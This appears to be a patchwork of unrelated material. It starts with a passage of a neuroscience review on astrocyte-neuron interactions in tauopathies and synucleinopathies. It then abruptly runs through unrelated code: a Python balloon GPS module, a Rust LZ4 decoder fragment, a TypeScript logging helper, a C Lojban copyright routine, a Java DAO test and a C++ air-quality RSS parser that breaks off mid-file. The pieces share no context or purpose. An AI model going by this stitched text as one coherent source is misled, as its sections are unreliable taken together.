Also, astrocytes are enriched in glycolytic enzymes and produce glycogen, as a source of lactate that can be transferred to neighboring neurons by monocarboxylate transporters (Magistretti and Allaman, 2018). This pathway, known as the lactate shuttle, links astrocytic glycolysis with neuronal oxidative metabolism. Another key astrocytic-neuronal exchange involves glutamine (Gln) and glutamate (Glu). In astrocytes, Gln is synthesized from Glu and ammonia, in a reaction mediated by the astrocyte-specific enzyme, Gln synthetase (GS) (Martinez-Hernandez et al., 1977). Gln is transferred to neurons, where it is hydrolyzed to Glu by phosphate-activated glutaminase (PAG). Depending on the neuron type, Glu can be included into the neurotransmitter pool of Glu, or can be converted to GABA in a reaction mediated by Glu decarboxylase (Bak et al., 2006). Additionally, Glu can be converted to α-ketoglutaric acid by Glu dehydrogenase, to supplement the tricarboxylic acid cycle and neuronal energy production (Martinez-Hernandez et al., 1977). Although Glu can be produced by the carboxylation of pyruvate or the transamination of α-ketoglutaric acid, astrocyte-derived Gln is the main source of the neurotransmitter pool of Glu (Hamberger et al., 1978). Following release from synaptic terminals, Glu is taken up by neighboring astrocytes via Glu transporters and converted to Gln, which closes this circular astrocytic-neuronal pathway, known as the Gln/Glu cycle (GGC) (Bak et al., 2006). This pathway involves cooperation of astrocytic and neuronal transmembrane transporters. Sodium-dependent Glu transporters, GLT1 (Glu transporter 1; EAAT2) and GLAST (glutamate-aspartate transporter; EAAT1), are localized perisynaptically on the astrocytic cell membrane (Takumi et al., 1997). Cellular translocation of Gln across the membranes of CNS cells involves complex carrier systems that, apart from Gln, can transport some other amino acids.
Individual members of these transporter families are characterized by defined cellular distribution, substrate specificity and different affinities for specific amino acids (Bröer, 2014). Among them, the sodium-dependent systems N, ASC, and A play a major role in Gln transport. The bidirectional system N transporters, sodium-coupled neutral amino acid transporters SNAT3 and SNAT5, are specifically located in astrocytes (Boulland et al., 2002). In addition, the outward translocation of Gln from astrocytes is also supported by transporters representing the other systems, ASCT2 (alanine-serine-cysteine transporter 2, belonging to the system ASC) and LAT2 (L-type AA transporter 2, belonging to the sodium-independent system L) (Deitmer et al., 2003). The unidirectional System A transporter SNAT1 (alanine transporter 1) that mediates Gln uptake is mostly responsible for Gln uptake by neurons. Gln transporters are also present in brain capillaries. Endothelial cells of cerebral microvessels, connected by tight junctions and forming the blood-brain barrier, are polarized into luminal (blood-facing) and abluminal (brain-facing) plasma membrane domains. The transporters belonging to system N transfer Gln within membrane vesicles enriched in the abluminal membranes of capillaries. The vesicles present in the luminal membranes transfer Gln by sodium-independent transporter(s) that are as yet poorly characterized (Bröer and Brookes, 2001). In order to control neurotransmission properly, neurons need to constantly replenish the neurotransmitters in the synaptic vesicles. These complex reactions involve surrounding glial cells that actively participate in this process by providing the precursors for neurotransmitter synthesis, recycling the transmitters and removing toxic metabolites. The majority of Gln release from astrocytes is mediated by an astroglia-specific carrier, SNAT3, present in close proximity to the synapse.
The released Gln is then taken up by a variety of transporter proteins localized on the nerve terminals and used for re-synthesis of Glu and GABA (Bak et al., 2006). Recent evidence suggests that astrocytes, together with pre- and post-synaptic neuronal terminals, are a part of the so-called tripartite synapse (Verkhratsky and Nedergaard, 2014). Such a localization of astrocytes allows them to participate in the structural formation and functioning of the synapses (Allen and Lyons, 2018). It is well established that astrocytes constantly and actively release different neurotrophic factors, including proteins, like chemokines or cytokines (e.g., glial cell line-derived neurotrophic factor, nerve growth factor), as well as small metabolites (e.g., nucleosides and nucleotides) that support neuronal function and survival (Verkhratsky et al., 2016). These factors can be delivered to the neurons either via exocytosis or can be contained in astrocyte-released exosomes (Vanturini et al., 2019). Exocytosis is responsible for the delivery of astrocyte-derived proteins, like extracellular matrix components, growth factors, chemokines and cytokines, whereas exosomes most often contain membrane proteins and RNA (Verkhratsky et al., 2016). These factors are essential for several processes, like maintaining neuronal health and extension of neurite outgrowths (Meyer-Franke et al., 1995). Furthermore, neuronal cells are characterized by relatively low levels of endogenous antioxidants. Astroglia support neurons by supplying a major cellular antioxidant, the reduced form of glutathione (McBean, 2018). Astrocytes in Diseased Brain As mentioned above, astrocytes, by providing essential support to neurons, play a pivotal role in the proper functioning of the healthy brain (Verkhratsky and Nedergaard, 2014). Properly functioning astroglia are critical for antioxidative defense and neutralization of reactive oxygen and nitrogen species (ROS/RNS) in neurons.
However, in injury or disease, the CNS is often exposed to extensive oxidative and nitrosative stress. Overproduction of ROS/RNS challenges the antioxidative defense system, which induces an astrocytic response, so-called reactive astrogliosis, involving a series of biochemical and morphological changes (Yates, 2015). Also, cytokines (e.g., transforming growth factor, interleukin-6 (IL-6), or ciliary neurotrophic factor) may be involved in the activation of reactive astrogliosis via the STAT3 signaling pathway (Pekny and Pekna, 2014). This process is associated with upregulation of astrocyte-specific structural proteins (glial fibrillary acidic protein (GFAP) and vimentin) as well as functional abnormalities, including impaired expression and function of GGC-related transporters and enzymes. Astrocyte activation is also manifested by increased expression of potassium channels and by disruption of the homeostasis of antioxidant molecules (e.g., glutathione). The response of astrocytes to acute and chronic cellular stress and further progressive reactive astrogliosis can result in the release of toxic factors, directly supporting neuronal injury and dysfunction (Rizor et al., 2019). Astrocytes and α-Synucleinopathies Astrocytic failure appears to precede various forms of neurodegenerative pathologies. For example, astrocytes are involved in the neuropathology of PD via augmentation of oxidative and nitrosative stress. Studies using PD transgenic (tg) animal models and post-mortem analysis of PD patients' brains revealed astrocyte activation and ROS/RNS elevation as a substantial hallmark of the PD-associated pathology (Rizor et al., 2019). Improper folding of disease-specific proteins, leading to neuronal damage, is the major feature of individual neurodegenerative disorders. The α-synuclein (αSYN) protein is present in the presynaptic terminals, and, under normal physiological conditions, plays a role in maintaining vesicular trafficking and SNARE complex formation.
In PD, αSYN undergoes incorrect folding, which results in its aggregation and the formation of Lewy bodies (Lashuel et al., 2013). αSYN is the main component of the neuropathological lesions present also in some other disorders, collectively known as α-synucleinopathies, which include, apart from PD, dementia with Lewy bodies and multiple system atrophy (Wegrzynowicz et al., 2019). Aggregation of αSYN is directly responsible for the disruption of dopaminergic and cholinergic neurotransmission and further cell death in PD. The exact mechanisms responsible for improper folding of αSYN remain to be clarified. Recent studies suggest that αSYN aggregates can spread between cells and tissues using a prion-like self-propagation mechanism (Figure 1). It is well established that aggregated αSYN is present in the cytoplasm of astrocytes in the human PD brain, which suggests a possible role of these cells in the spreading of αSYN pathology. Indeed, an in vitro study revealed that primary astrocytes can take up aggregated αSYN secreted from co-cultured SH-SY5Y human neuroblastoma cells. The accumulation of pathological αSYN deposits in astroglia promotes, in turn, the secretion of chemokines and proinflammatory cytokines (e.g., IL-1, IL-6, TNFα; Song et al., 2009). Astrocytes and Tau-Dependent Neurodegeneration Under physiological conditions, tau protein is present in neurons as a soluble microtubule-associated protein, where it plays important functions in neurogenesis, cytoskeleton stabilization, axonal maintenance, and axonal transport (Spillantini and Goedert, 1998). In addition, tau may also interact with other cellular components, like cytoplasmic organelles, the plasma membrane, the actin cytoskeleton and the nucleus (Nunez and Fischer, 1997). In the adult human brain, six tau isoforms are expressed as a result of alternative splicing of exons 2, 3 and 10 of the tau gene, MAPT, linked with the 17q21-2 locus.
Under pathological conditions, excessive dissociation of tau from the microtubules leads to accumulation of unbound, misfolded tau in the cytosol, resulting in its hyperphosphorylation and aggregation. Misfolded and hyperphosphorylated tau aggregates into paired helical filaments, which leads to the formation of more complex structures, neurofibrillary tangles (NFTs). Abnormal assembly of tau protein is found in several human neurodegenerative diseases, known collectively as tauopathies. The presence of NFTs is a common feature of AD, frontotemporal dementia with parkinsonism linked to chromosome 17 (FTDP-17) and several other disorders (Spillantini and Goedert, 1998). Identification of FTDP-17-related mutations in the MAPT gene, responsible for the disease pathogenesis through the misfolding and aggregation of mutated tau protein, allowed the development of transgenic cellular and animal models of tau pathology (Spillantini and Goedert, 2013). The most common FTDP-17-related mutations (e.g., P301S or P301L), in transgenic mouse models, result in motor and cognitive dysfunctions correlated with age- and gene dose-dependent accumulation of NFTs (Lewis and Dickson, 2016). Although misfolded and dysfunctional tau was proven to be a primary factor in the development of tauopathies, the cellular mechanisms involved in tau-related neurodegeneration are still poorly understood. Astrocyte activation, reactive gliosis and dysfunction of glial cells are common for almost all human neurodegenerative disorders (Mohn and Koob, 2015). In the tauopathies, both in patients and in in vivo models, astrogliosis is present in brain regions affected by the pathological process. Astrogliosis is found before neuronal loss, which may suggest a contribution of astrocytic pathology to the development of tau-related disorders.
Direct evidence for astrocytic dysfunction was provided by an experiment in which transplantation of exogenous, neuron precursor cell-derived astrocytes resulted in a significant reduction of neurodegenerative phenotypes in mice expressing P301S mutant tau under the control of the neuronal Thy1.2 promoter. This indicates that endogenous astrocytes in the tauopathy are deprived of their neuroprotective function and/or may gain novel neurotoxic properties (Hampton et al., 2010). A recent study with tg P301S mice expressing the mutant human 4R/0N tau isoform revealed that transplantation of astrocytes prevents death of cortical neurons, suggesting that the endogenous astrocytes in tauopathy lose their neurosupportive properties and instead intensify the neuropathological processes. A study using in vitro co-culture systems demonstrated that primary cortical astrocytes or astrocyte-conditioned medium (ACM) from wild-type mice have neuroprotective properties that are significantly reduced in astrocytes or ACM from P301S mice (Sidoryk-Wegrzynowicz et al., 2019). Furthermore, ACM from tau mutant mice significantly decreased the expression of presynaptic and postsynaptic markers (synaptophysin and PSD95, respectively) in cortical neuronal cultures, whereas wild-type mouse ACM increased the expression of these proteins. This negative effect on neuronal viability and function was found for astrocytes derived from transgenic animals at an age when no tau pathology is yet observed in neurons in vivo. This indicates that some pathological alterations precede tau aggregation in tauopathy, and that astroglial failure might be related to the manifestations of neuronal mutant tau toxicity at the early, pre-aggregation stage, before the onset of the disease.
Such a loss of neurosupportive function was also confirmed for astrocytes cultured from another established transgenic model of tauopathy, mice expressing human P301L 2N4R tau specifically in neurons, indicating that these findings can be generalized as being a common symptom of tau-related pathology. The same study also revealed that astrocytes in tau mutant mice exhibit an altered phenotype compared to control animals already at an early, presymptomatic stage. P301S mice were characterized by increased expression of astrocytic structural markers, GFAP and S100β, in the cortex, confirming ongoing astrogliosis. In contrast, the cortical levels of astrocytic proteins involved in neuronal support, particularly those related to the GGC (GS, GLAST, and GLT1), were decreased (Sidoryk-Wegrzynowicz et al., 2019). Similarly, significant abnormalities in the expression of astrocytic proliferation markers and GGC components were found in primary astrocyte cultures derived from P301S tau mice. These findings indicate that astrocytes from tau mutant mice, both in vivo and in vitro, gain a pathological phenotype beginning from an early postnatal stage, which contributes to tau-related neuropathology also in adulthood (Sidoryk-Wegrzynowicz et al., 2019). Astrocytes and Tau Spreading Under physiological conditions, astrocytes do not express tau protein (Sidoryk-Wegrzynowicz et al., 2019). However, in some tauopathies, abnormal accumulation of tau protein is not restricted to neurons, but is also found in glial cells. While in AD tau aggregates in neurons, in other tauopathies, including corticobasal degeneration (CBD) or progressive supranuclear palsy, tau protein is found in astrocytes and oligodendrocytes. A recent study shows that glial tau pathology can be reproduced in animal models of tauopathies by injection of brain homogenates derived from AD or FTLD patients (Forrest et al., 2019).
Most recently, pathological tau species, including astrocytic plaques or globular astroglial inclusions, were found in several morphological types of pathological, tauopathy-related astrocytes, such as tufted, ramified, thorn-shaped, or granular astrocytes. Tufted astrocytes are characterized by symmetric tau inclusions in the proximal processes and are pathological hallmark lesions in progressive supranuclear palsy. Tau-immunopositive globular cytoplasmic deposits in proximal astrocytic processes are observed in the cortex in globular glial tauopathy cases (Kovacs et al., 2017). Astrocytes with tau inclusions in distal processes are a distinguishing neuropathological hallmark of CBD (Forrest et al., 2019). A growing body of evidence suggests that tau pathology spreads between neurons using a prion-like self-propagation mechanism, but also that the aggregated tau species are transferred from neurons to the other CNS cells (Yamada and Hamaguchi, 2018). A study revealed that cellular uptake of vesicle-bound or free tau may involve several cellular pathways (e.g., clathrin-dependent endocytosis, macropinocytosis, or direct membrane fusion). Interestingly, expression of the bridging integrator-1 gene, which negatively regulates clathrin-dependent endocytosis, is inversely correlated with tau pathology, suggesting that clathrin-dependent endocytosis contributes to tau translocation and pathology (Calafate et al., 2016). Another study revealed that tau inclusions are translocated between cells through a heparan sulfate proteoglycan (HSPG)-dependent mechanism (Yamada and Hamaguchi, 2018). More recently, the lysosomal pathway was suggested as a mechanism responsible for fibrillar tau internalization by astrocytes (Martini-Stoica et al., 2018).
Given that fibrillar, aggregated tau is considered a major histopathological hallmark of tauopathies, it is worth noting that the uptake of monomeric forms of the protein by astrocytes may also be involved in the toxicity and spreading of the disease (Falcon et al., 2017). Although the mechanism by which monomeric tau is taken up by astrocytes is still unknown and deserves further investigation, a recent study suggests that it may be independent of the HSPG-mediated mechanism (Perea et al., 2019). Notably, recent studies confirmed tau spreading in the brains of AD patients, showing tau seeding between synaptically connected brain regions before the occurrence of advanced tau pathology (DeVos et al., 2018). Neuroinflammation and Neurodegeneration Microglia are derived from the macrophage cell lineage and account for about 12% of the cells in the CNS. These cells regulate several processes during both development and adulthood (Ransohoff and El Khoury, 2015). They are involved in a wide variety of functions, including removal of pathogens; phagocytosis of apoptotic cells and cellular debris; secretion of growth factors; pro-inflammatory and anti-inflammatory signaling; as well as remodeling and elimination of synapses (Michell-Robinson et al., 2015). Microglia-derived factors are critical for the regulation of the host response to inflammation, an important feature of regeneration and repair (Bolós et al., 2017). In a chronic condition, however, the prolonged state of inflammation is disruptive (Augusto-Oliveira et al., 2019). It is well established that microglial dysfunction contributes to neurodegeneration (Bolós et al., 2017). Single-cell transcriptomic analyses in AD and other neurodegenerative diseases, like amyotrophic lateral sclerosis, revealed alterations in the expression of several genes involved in microglial functions as the disease progresses (Mathys et al., 2017).
Hyperphosphorylated tau protein negatively affects neuronal function and promotes the pro-inflammatory activity of microglia, which, in turn, exacerbates AD pathology. A recent study revealed aberrant exposure of phosphatidylserine on the outer surface of tau inclusion-positive neurons derived from P301S mice. Interestingly, co-culturing with microglial cells (BV2 cell line or primary microglia) led to the phagocytosis of these phosphatidylserine-exposing neurons through a mechanism dependent on the release of milk fat globule-EGF factor 8 and nitric oxide from the microglial cells. Furthermore, increased expression of milk fat globule-EGF factor 8 was found to be restricted to the tau inclusion-enriched areas of the brain in the transgenic P301S tau mice and in different human tauopathies, suggesting a common mechanism of cell death in the tauopathies (Brelstaff et al., 2018). More recently, interest in the involvement of inflammation-induced reactive astrocytes in neuronal pathology has been growing in the context of neurodegenerative diseases. A recent study has shown that abnormalities in the astrocytic functions contributing to the propagation of inflammation within the CNS are associated with the activation of microglia (Liddelow and Barres, 2017). In pathological, neurodegeneration-related conditions, microglia activate astrocytes by secreting several pro-inflammatory mediators such as nitric oxide and cytokines (e.g., IL-1β, TNF-α, IL-6), which drives neuroinflammation. So-called type-1 astrocytes (A1; nomenclature analogous to the M1 state of microglial activation), once activated by microglia, become neurotoxic and negatively affect neuronal functions; this activation is driven by the pro-inflammatory factors IL-1α, TNF-α, and C1q. Recent evidence suggests that the polarization of astrocytes to the A1 phenotype results in a loss of their essential neuroprotective properties (Figure 2).
For example, dysfunctional activation of astrocytes in mouse models of AD impairs neuronal survival through activation of microglia (Sadick and Liddelow, 2019). Identification of complement component 3, overexpressed specifically in A1 astrocytes, allowed detection of active, neurotoxic astrocytes in different human neurodegenerative diseases, including PD, AD, Huntington's disease, amyotrophic lateral sclerosis, and multiple sclerosis. These changes were observed in the brain regions specifically affected in the individual diseases (e.g., the caudate nucleus in HD, the hippocampus and prefrontal cortex in AD, the substantia nigra in PD, the motor cortex in amyotrophic lateral sclerosis, and acute demyelinating lesions in multiple sclerosis). An in vitro study using retinal ganglion neurons cultured with A1 astrocytes indicated that the neurons developed significantly fewer synapses compared with neurons cultured with control astrocytes, suggesting that A1 astrocytes disassembled or failed to maintain the synapses. Furthermore, A1 astrocytes were found to release a soluble toxin that causes death of neurons and mature oligodendrocytes, most likely via the induction of apoptosis. Given that glia function as a key regulator of inflammation in the CNS, modifications of these cells may help to prevent pro-inflammatory events. For example, minocycline, an antibiotic implicated in the anti-inflammatory response, reduces the number of activated astrocytes in the cortex of transgenic mice expressing human tau, as identified by GFAP immunoreactivity and astrocytic morphological changes (Garwood et al., 2010). Minocycline administration to relatively young mice expressing human tau not only reduces astrogliosis but also decreases several pro-inflammatory mediators, which strongly correlated with the phosphorylation of tau at Ser396/404 in the cortex.
In addition, minocycline treatment reduces the development of disease-associated aggregated tau species in a mouse model of human tauopathy (Noble et al., 2009). Altogether, identification of novel cytokine targets may help to establish novel therapeutic approaches against AD and other tau-related neurodegenerative diseases.

Concluding Remarks

A growing body of evidence suggests heterogeneity of the processes related to the neuronal dysfunction and death observed in neurodegenerative diseases. The major mechanism leading to neurodegeneration involves disruption of astrocyte-neuron integrity. Recent studies additionally indicate the importance of microglia-astrocyte crosstalk at different stages of the diseases. The influence of microglia may shape the astrocytic response under neuropathological conditions. Understanding the mechanisms associated with astrocyte function/dysfunction may pave the way for new, specific, glia-targeted therapeutic strategies against neurodegenerative disorders.

Figure 2 | A scheme of the proposed impairment of astrocyte-neuron-microglia interactions in the neurodegenerative diseases. Astrocytes, as a consequence of exposure to neuroinflammation and microglia-derived activating signals (e.g., the released factors interleukin-1β (IL-1β), tumor necrosis factor-α (TNF-α), and C1q), become reactive and acquire a functional deficit resulting in a loss of their neurosupportive properties. This multistep process is common to many neurodegenerative disorders, including α-synucleinopathies and tauopathies. It involves robust activation of both astrocytes and microglia that essentially contribute to excitotoxicity-dependent neuronal dysfunction, leading finally to synapse loss and neurodegeneration. CNS: Central nervous system.
#!/usr/bin/env python3
import logging
import math
import time

from threading import Thread

from ublox import *


class GPSModule(Thread):
    gps = None
    latitude = 0.0
    longitude = 0.0
    altitude = 0.0
    fix_status = 0
    satellites = 0
    healthy = True
    onHighAltitude = False

    def __init__(self, portname="/dev/ttyUSB0", timeout=2, baudrate=9600):
        logging.getLogger("HABControl")
        logging.info('Initialising GPS Module')
        try:
            self.gps = UBlox(port=portname, timeout=timeout, baudrate=baudrate)
            self.gps.set_binary()
            self.gps.configure_poll_port()
            self.gps.configure_solution_rate(rate_ms=1000)
            self.gps.set_preferred_dynamic_model(DYNAMIC_MODEL_PEDESTRIAN)
            self.gps.configure_message_rate(CLASS_NAV, MSG_NAV_POSLLH, 1)
            self.gps.configure_message_rate(CLASS_NAV, MSG_NAV_SOL, 1)
            Thread.__init__(self)
            self.healthy = True
            self.start()
        except Exception as e:
            logging.error('Unable to initialise GPS: %s' % str(e), exc_info=True)
            self.gps = None
            self.healthy = False

    def run(self):
        while self.healthy:
            self.readData()
            time.sleep(1.0)

    def checkPressure(self, pressure):
        alt = 0.0
        # Note: "is not 0" tests identity, not value; use != for numeric checks.
        if pressure != 0:
            # International barometric formula (pressure in hPa, altitude in m).
            alt = 44330.0 * (1.0 - math.pow(pressure / 1013.25, 0.1903))
        self.checkAltitude(alt)

    def checkAltitude(self, altitude):
        if altitude != 0:
            # Switch to the airborne dynamic model above 9 km; switch back
            # below 8 km (the gap avoids flapping near the threshold).
            if altitude > 9000 and not self.onHighAltitude:
                self.onHighAltitude = True
                self.gps.set_preferred_dynamic_model(DYNAMIC_MODEL_AIRBORNE1G)
            if self.onHighAltitude and altitude < 8000:
                self.onHighAltitude = False
                self.gps.set_preferred_dynamic_model(DYNAMIC_MODEL_PEDESTRIAN)

    def readData(self):
        try:
            msg = self.gps.receive_message()
            if msg is not None:
                logging.debug(msg)
                if msg.name() == "NAV_SOL":
                    msg.unpack()
                    self.satellites = msg.numSV
                    self.fix_status = msg.gpsFix
                elif msg.name() == "NAV_POSLLH":
                    msg.unpack()
                    self.latitude = msg.Latitude * 1e-7
                    self.longitude = msg.Longitude * 1e-7
                    self.altitude = msg.hMSL / 1000.0
                    if self.altitude < 0.0:
                        self.altitude = 0.0
        except Exception as e:
            logging.error("Unable to read from GPS Chip - %s" % str(e), exc_info=True)
            self.healthy = False

    def close(self):
        logging.info("Closing GPS Module object")
        self.healthy = False
        self.gps.close()
        self.gps = None
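The pressure-to-altitude conversion used in checkPressure can be illustrated on its own. This is a minimal sketch of the same international barometric formula (1013.25 hPa is standard sea-level pressure); the helper name pressure_to_altitude is ours, not part of the module.

```python
import math


def pressure_to_altitude(pressure_hpa, sea_level_hpa=1013.25):
    """Approximate altitude in metres from static pressure in hPa,
    using the international barometric formula as in checkPressure."""
    if pressure_hpa <= 0:
        # Non-physical input; the module treats this as ground level.
        return 0.0
    return 44330.0 * (1.0 - math.pow(pressure_hpa / sea_level_hpa, 0.1903))
```

At standard sea-level pressure the result is exactly zero, and 500 hPa (roughly half an atmosphere) maps to somewhere in the 5-6 km range, which matches the altitudes where the module switches dynamic models.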
/// Creates a new Decoder for the specified reader.
pub fn new(rdr: R) -> FrameDecoder<R> {
    FrameDecoder {
        r: rdr,
        src: Default::default(),
        dst: Default::default(),
        ext_dict_offset: 0,
        ext_dict_len: 0,
        dst_start: 0,
        dst_end: 0,
        current_frame_info: None,
        content_hasher: XxHash32::with_seed(0),
        content_len: 0,
    }
}
import { parentPort } from "worker_threads";
import {
  JagoLogEntry,
  makeJagoSend,
  makeSend,
  cloneArrayEntries,
  tos,
} from "^jab";

const canSend = process.send || parentPort;

// This is only constructed if there is an IPC connection or this is a worker.
// But it would be better to detect whether jago actually started this.
let sendFunction: (entry: JagoLogEntry) => void;

/**
 *
 */
const parentSend = (msg: any) => {
  if (!sendFunction) {
    sendFunction = makeJagoSend(makeSend());
  }
  sendFunction(msg);
};

/**
 *
 */
export const out = (...data: unknown[]) => {
  if (canSend) {
    parentSend({
      type: "log",
      data: cloneArrayEntries(data),
    });
  } else {
    console.log(tos(data));
  }
};

/**
 *
 */
export const outHtml = (html: string) => {
  if (canSend) {
    parentSend({ type: "html", data: html });
  } else {
    console.log("Html not displayed in console.");
  }
};

/**
 * todo: encode
 */
export const outLink = (name: string, href: string) => {
  outHtml(`<a href="${href}">${name}</a>`);
};

/**
 * todo: encode
 */
export const outImg = (src: string) => {
  outHtml(`<img src="${src}" />`);
};
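The `todo: encode` notes on outLink and outImg flag that href/src values are interpolated into HTML unescaped. A minimal sketch of the escaping these todos call for, shown here in Python for illustration (the helper name out_link is hypothetical; a TypeScript version would use an equivalent attribute-escaping routine):

```python
import html


def out_link(name, href):
    # Escape both the attribute value and the text content before
    # interpolation; html.escape(quote=True) also encodes double quotes,
    # which matters inside the href="..." attribute.
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                    html.escape(name))
```

With this in place, a quote or angle bracket in the inputs can no longer break out of the attribute or inject markup.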
/* Copyright 1992-2003 Logical Language Group Inc.
   Licensed under the Academic Free License version 2.0 */

#include "lojban.h"
#include "version.h"

void copyright()
{
    fprintf(stderr, "3;0;");
    /* VERSION is a string, so VERSION + 1 strips the first character */
    fprintf(stderr, VERSION + 1);
    fprintf(stderr, "moi ke lojbo genturfa'i\n");
    fprintf(stderr, "Copyright 1991,1992,1993 The Logical Languages Group, Inc. All Rights Reserved\n");
}
/*
 * Copyright 2016 Netflix, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 * the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
 * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations under the License.
 */
package com.netflix.conductor.dao.mysql;

import com.netflix.conductor.common.metadata.workflow.WorkflowDef;
import com.netflix.conductor.common.run.Workflow;
import com.netflix.conductor.dao.ExecutionDAO;
import com.netflix.conductor.dao.ExecutionDAOTest;
import org.junit.After;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TestName;

import java.util.List;

import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;

@SuppressWarnings("Duplicates")
public class MySQLExecutionDAOTest extends ExecutionDAOTest {

    private MySQLDAOTestUtil testMySQL;
    private MySQLExecutionDAO executionDAO;

    @Rule
    public TestName name = new TestName();

    @Before
    public void setup() throws Exception {
        testMySQL = new MySQLDAOTestUtil(name.getMethodName());
        executionDAO = new MySQLExecutionDAO(
                testMySQL.getObjectMapper(),
                testMySQL.getDataSource()
        );
        testMySQL.resetAllData();
    }

    @After
    public void teardown() {
        testMySQL.resetAllData();
        testMySQL.getDataSource().close();
    }

    @Test
    public void testPendingByCorrelationId() {
        WorkflowDef def = new WorkflowDef();
        def.setName("pending_count_correlation_jtest");

        Workflow workflow = createTestWorkflow();
        workflow.setWorkflowDefinition(def);

        String idBase = workflow.getWorkflowId();
        generateWorkflows(workflow, idBase, 10);

        List<Workflow> byCorrelationId = getExecutionDAO().getWorkflowsByCorrelationId("corr001", true);
        assertNotNull(byCorrelationId);
        assertEquals(10, byCorrelationId.size());
    }

    @Override
    public ExecutionDAO getExecutionDAO() {
        return executionDAO;
    }
}
// Copyright 2019 <NAME>
// This code is licensed under MIT license (see LICENSE for details)

#include "parser.h"

#include <TinyXML.h>

#include "network.h"

namespace spare_the_air {
namespace {

static_assert(kMaxNumEntries >= kNumStatusDays, "Too small");

constexpr const char kRegion[] = "Santa Clara Valley";

// Buffer used by the XML parser.
uint8_t g_xml_parse_buffer[512];

// The index of the forecast item in the XML response used by the
// XML parser callback.
int g_parse_channel_item_idx = 0;

// The response from the alert url.
Status g_today;

// The first one is today, which is made up from both the alert request
// and the corresponding forecast entry.
Status g_forecasts[kMaxNumEntries];

// Empty status used for errors.
Status g_empty_status;

// This is the index into |g_forecasts| that corresponds to the alert day
// (i.e., today).
int g_today_idx = -1;

void XML_Alertcallback(uint8_t status_flags,
                       char* tag_name,
                       uint16_t /*tag_name_len*/,
                       char* data,
                       uint16_t /*data_len*/) {
  if (!(status_flags & STATUS_TAG_TEXT))
    return;
  if (!strcasecmp(tag_name, "/rss/channel/item/date")) {
    g_today.date_full = data;
  } else if (!strcasecmp(tag_name, "/rss/channel/item/description")) {
    g_today.alert_status = data;
  }
}

void XML_ForecastCallback(uint8_t status_flags,
                          char* tag_name,
                          uint16_t /*tag_name_len*/,
                          char* data,
                          uint16_t /*data_len*/) {
  if ((status_flags & STATUS_END_TAG) &&
      !strcasecmp(tag_name, "/rss/channel/item")) {
    g_parse_channel_item_idx++;
    return;
  }
  if (!(status_flags & STATUS_TAG_TEXT))
    return;
  if (g_parse_channel_item_idx >= kMaxNumEntries) {
    return;
  }
  Status& forecast = g_forecasts[g_parse_channel_item_idx];
  if (!strcasecmp(tag_name, "/rss/channel/item/title")) {
    forecast.date_full = data;
    forecast.day_of_week = Parser::ExtractDayOfWeek(forecast.date_full);
  } else if (!strcasecmp(tag_name, "/rss/channel/item/description")) {
    RegionValues values = Parser::ExtractRegionValues(data, kRegion);
    AQICategory category = Parser::ParseAQIName(values.aqi);
    if (category == AQICategory::None) {
      // Not a category name, so assume it is a numeric AQI value.
      forecast.aqi_val = atoi(values.aqi.c_str());
      forecast.aqi_category = Parser::AQIValueToCategory(forecast.aqi_val);
    } else {
      forecast.aqi_category = category;
    }
    forecast.pollutant = values.pollutant;
  }
}

}  // namespace

// static
String Parser::ExtractDayOfWeek(const String& str) {
  // This is the format used in the forecast item title.
  const int kPrefixLen = 32;
  int idx = str.indexOf("BAAQMD Air Quality Forecast for ");
  if (idx == 0)
    return str.substring(kPrefixLen);
  idx = str.indexOf(",");
  if (idx <= 0)
    return String();
  return str.substring(0, idx);
}

// The region data is of the form:
//
// "Santa Clara Valley - AQI: 55, Pollutant: PM2.5"
//
// static
RegionValues Parser::ExtractRegionValues(const String& region_data,
                                         const String& region_name) {
  RegionValues values;
  int region_idx = region_data.indexOf(region_name);
  if (region_idx < 0)
    return values;
  values.name = region_name;
  int idx = region_data.indexOf("AQI: ", region_idx);
  if (idx > region_idx) {
    int end = region_data.indexOf(",", idx);
    const int kAqiLen = 5;  // Length of "AQI: "
    if (end > idx)
      values.aqi = region_data.substring(idx + kAqiLen, end);
  }
  idx = region_data.indexOf("Pollutant: ", region_idx);
  if (idx > region_idx) {
    int end = region_data.indexOf("\n", idx);
    const int kPollutantLen = 11;  // Length of "Pollutant: "
    if (end > idx) {
      // Not the last value.
      values.pollutant = region_data.substring(idx + kPollutantLen, end);
    } else {
      // The last value in the data string.
      values.pollutant = region_data.substring(idx + kPollutantLen);
    }
  }
  return values;
}

// static
AQICategory Parser::ParseAQIName(const String& name) {
  if (name == "Good")
    return AQICategory::Good;
  if (name == "Moderate")
    return AQICategory::Moderate;
  if (name == "Unhealthy for Sensitive Groups")
    return AQICategory::UnhealthyForSensitiveGroups;
  if (name == "Unhealthy")
    return AQICategory::Unhealthy;
  if (name == "Very Unhealthy")
    return AQICategory::VeryUnhealthy;
  if (name == "Hazardous")
    return AQICategory::Hazardous;
  return AQICategory::None;
}

// static
const char* Parser::AQICategoryAbbrev(AQICategory category) {
  switch (category) {
    case AQICategory::Good:
      return "G";
    case AQICategory::Moderate:
      return "M";
    case AQICategory::UnhealthyForSensitiveGroups:
      return "USG";
    case AQICategory::Unhealthy:
      return "U";
    case AQICategory::VeryUnhealthy:
      return "VU";
    case AQICategory::Hazardous:
      return "H";
    case AQICategory::None:
      return "?";
  }
  return "?";
}

// static
AQICategory Parser::AQIValueToCategory(int value) {
  if (value < 0)
    return AQICategory::None;
  if (value <= 50)
    return AQICategory::Good;
  if (value <= 100)
    return AQICategory::Moderate;
  if (value <= 150)
    return AQICategory::UnhealthyForSensitiveGroups;
  if (value <= 200)
    return AQICategory::Unhealthy;
  if (value <= 300)
    return AQICategory::VeryUnhealthy;
  return AQICategory::Hazardous;
}

// static
void Parser::ParseAlert(const String& xmlString) {
  TinyXML xml;
  xml.init((uint8_t*)g_xml_parse_buffer, sizeof(g_xml_parse_buffer),
           &XML_Alertcallback);
  for (size_t i = 0; i < xmlString.length(); i++) {
    xml.processChar(xmlString[i]);
  }
  g_today.day_of_week = Parser::ExtractDayOfWeek(g_today.date_full);
}

// static
